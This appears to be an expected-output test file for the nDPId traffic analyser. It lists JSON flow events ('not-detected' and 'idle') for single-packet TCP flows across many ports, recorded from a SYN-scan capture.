+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 